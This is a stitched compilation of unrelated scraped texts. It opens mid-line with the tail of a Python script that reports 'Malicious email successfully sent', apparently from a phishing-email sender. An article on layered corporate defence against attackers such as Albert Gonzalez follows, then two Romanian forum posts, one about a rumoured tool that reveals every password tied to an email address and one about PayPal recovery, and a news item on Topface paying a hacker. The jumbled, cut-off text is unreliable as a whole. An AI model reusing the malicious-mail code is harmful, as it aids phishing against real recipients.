int(smtpServerPort)); smtpObj.sendmail(sender, receivers, message) print "[+] Malicious email successfully sent." except SMTPException: print "[-] Error: unable to send the email. Invalid SMTP server ???" sys.exit(2) Source

TJX hacking mastermind Albert Gonzalez scoffed at antivirus tools. He and his cohorts wrote malware specifically designed to evade their detection. One can imagine him laughing as his team of hackers broke into corporate networks using SQL injection attacks and gained administrative access. Then he probably guffawed, Bond villain-style, as he uploaded the malware directly into server memory, and when the corporate networks began happily delivering customer credit card data directly to his servers chuckled all the way to the bank. Gonzalez was perhaps the biggest cyber criminal in history. He was eventually jailed for hacking more than 250 companies, ranging from retailers such as TJX and grocery chain Hannaford Bros through to payment processing company Heartland. He pilfered data from under their noses and cost them hundreds of millions of dollars. Even though many of these firms had antivirus software installed, they didn’t detect what he was doing. Why? Mind the gaps Don’t be mistaken: antivirus software is a crucial part of any security arsenal and every day malware scanners the world over detect and throttle millions of malicious software strains. This is not a category of software that we should live without. Antivirus tools work by scanning both static files and programs running in memory. They use several techniques to try and detect malicious activity. Signature scanning, which looks for known patterns in files, is a well-established method of finding software nasties, as its scanning code runs in memory, looking for potentially malicious activity as it happens. These are solid, reliable tools but when attackers are determined enough, antivirus software alone may not stop them from grabbing your data. The malware industry thrives on zero-day attacks – exploits using obscure or completely unknown vulnerabilities. A hacker smart enough to devise one – and there are plenty – can get past malware detectors. The smart IT manager uses complementary technologies to reduce the risk of attack, and one is to look at the potential delivery channels for malware. Ugly sites One way in which attacks are delivered is via drive-by downloads. Employees visiting legitimate work sites are relatively safe, but when they visit less savoury sites online they run the risk of being infected by rogue JavaScript running in the browser. Web protection software can reduce that risk by blacklisting certain sites or groups of sites. Filtering web access is a good way to reduce the risk of infection by simply prohibiting access to sites that are not necessary for work. It can also be a worthy complement to antivirus software that will attempt to detect anything installed via the browser. This multi-faceted protection is a basic tenet of modern cyber security. Another important vector is email. This has gained huge traction among attackers, who use it for phishing, and in some cases spear phishing targeting specific companies. Attackers can gather information about a company's organisational structure and employees. The list of sources here is endless, ranging from annual reports through to social media posts. These can be used to socially engineer employees to obtain login details or have them open a file containing a zero-day attack. Employee training is all-important here but it must be backed by a technological solution too. All it takes is for one user to open a file or click a link to a fake IT administrator page asking them to enter their single sign-on password as part of a security audit, and you can wave goodbye to the integrity of your network. Big phish The best way to counter threats delivered via email is to choke them off before employees even see them. Monitoring and filtering emails is therefore an important part of any corporate cyber-security strategy. Email can be scanned for viruses, and it can be controlled still further by scanning for known spam signatures and characteristics. This alone can root out the lion’s share of malicious or pestering emails, increasing employee productivity as well as reducing the risk of compromise. Adding blacklists for known bad domains and whitelists for recognised sources, such as business partners and customers, can be an extra-useful technique for locking email down. The further that companies can keep unscrubbed email away from their IT architectures the better. Pre-filtered email streams contain not only infected files but also large volumes of spam, which serve only to clog bandwidth and servers. Having these filtered offsite by a third-party service mitigates the problem, ensuring that only clean communications touch company servers. Patch and mend Even after all these measures have been taken, there is still the chance that a company’s systems can be compromised. The likes of Gonzalez, or the Sony Pictures hackers, are determined assailants. The battle doesn’t stop with web protection or email scanning. Making sure the software running on the network is up to date is an important aspect of any cyber-security strategy so that attackers can’t exploit any of the known vulnerabilities in the average operating system or application. Patch management processes and tools are critical, especially as companies grow larger and IT infrastructures become more complex. Understanding what has been rolled out and when can help IT administrators prevent dangerous holes from appearing in the system. All of these measures, layered onto antivirus software, can help to reduce the risk of a successful cyber attack. Here’s the dirty little secret of cyber security, though: nothing is 100 per cent secure. The key is to make things so difficult for attackers that they decide to move on to easier targets. The way to do that is to layer your defences, using multiple tools and protecting different parts and communications channels of the IT infrastructure. Managing it centrally also gives you a single point of access, helping you not only to quash incidental attacks but also to spot any emerging trends that could indicate a sustained, targeted assault on your company. This concept reflects a long-established military strategy: defence in depth, in which layers wear down an attacker’s ability to mount an offensive. In a modern environment, where companies live and die by their data, don’t rely on a thin red line to protect it all. Source

Exista sau ar putea exista vreun program care sa iti dea toate parolele de la toate conturile facute pe adresa de email ? inclusiv cea de facebook chiar si parola de email ? Raspunsul vostru sigur va fi nu... Am o cunostinta care nu are nici o treaba cu programarile hacking etc... dar detinea un asemenea program sau ce o fi fost ! Ii spuneai adresa de email si iti dadea toate parolele de la toate conturile unde foloseai acea adresa de email !!! ba chiar un amic student la it ia aratat profesorului lista si ia explicat ce sa intamplat iar profesorul a spus ca este imposibil ! acea cunostinta provine dintr-o familie instarita defapt cuvantul instarita este putin spus... sunt curios ce ziceti de asta...

Salut si ma scuzati daca postez sau cer cv gresit, nu am 10 posturi dar sunt vechi pe acest forum .. Am si eu o intrebare.. ce pot face daca mi-am uitat intrebarile secrete la contul paypal ? detin adresa de email si contul e al meu nu le-am mai folosit de cv timp.. si am uitat parola , nu pot intra pe el singura modalitate era sa recapat parola prin email dar imi cere intrebari secrete... ce pot face? Multumesc. si scuze inca odata

Topface, one of the world's largest dating websites, said it has paid a hacker an undisclosed sum to stop trying to sell about 20 million email addresses stolen from the Russian company. Topface Chief Executive Dmitry Filatov said the company located the hacker, who had published ads to sell the data but had not actually sold them. "We have paid him an award for finding a vulnerability and agreed on further cooperation in the field of data security," Filatov said in an email on Friday, declining to disclose the size of the reward. Topface says it has some 92 million users and 1.6 million daily visitors. Cybersecurity experts typically advise companies not to pay hackers to return stolen data, calling that a ransom and saying cybercriminals often break promises. But Filatov noted that the ads have already been removed and Topface has agreed not to pursue charges against the unidentified individual. "As we made an agreement with him we do not see any reason for him to break it," said Filatov. Atlanta-based fraud protection firm Easy Solutions disclosed the hack on Sunday, reporting on its blog that a hacker known as "Mastermind" was attempting to sell 20 million credentials from an unnamed dating site. Only email address had been stolen, Filatov said. "There was no access to other information - neither passwords, nor content of the accounts." Source